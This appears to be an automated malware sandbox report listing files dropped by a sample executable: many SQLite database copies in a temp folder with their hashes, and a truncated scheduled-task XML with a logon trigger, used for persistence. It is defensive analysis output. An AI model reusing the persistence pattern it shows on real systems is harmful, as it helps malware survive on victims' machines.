                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F82.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8745947603342119
                                                        Encrypted:false
                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F92.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5FA3.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp7075.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1595
                                                        Entropy (8bit):5.098188099867554
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL0xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTwv
                                                        MD5:4700BC65C015B33E95795A2C680A45A0
                                                        SHA1:EC1119C04CDC067D631E546B7EF967898F2220FD
                                                        SHA-256:257BBDE300ABF787E0519345C28AB5DC99DBA0E2988F22D8D724EB51888FEAFF
                                                        SHA-512:E322A63621A4BF0A137EE2685663E7EDF8B81D74B9E96495F608031F03E1E3CF0036B0D755C24DCE39FC98D8736128E157B999BD7A8E8A06CFBD3BB9A9D47C79
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                        C:\Users\user\AppData\Local\Temp\tmp73DB.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp73FC.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp73FD.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp741D.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp742E.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp743E.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08235737944063153
                                                        Encrypted:false
                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp744F.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08235737944063153
                                                        Encrypted:false
                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E11.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E21.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E22.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E33.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E34.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E44.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E55.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E66.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8E76.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp94FC.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp951C.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp952D.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1239949490932863
                                                        Encrypted:false
                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                        MD5:271D5F995996735B01672CF227C81C17
                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp954D.tmp

                                                        Download File
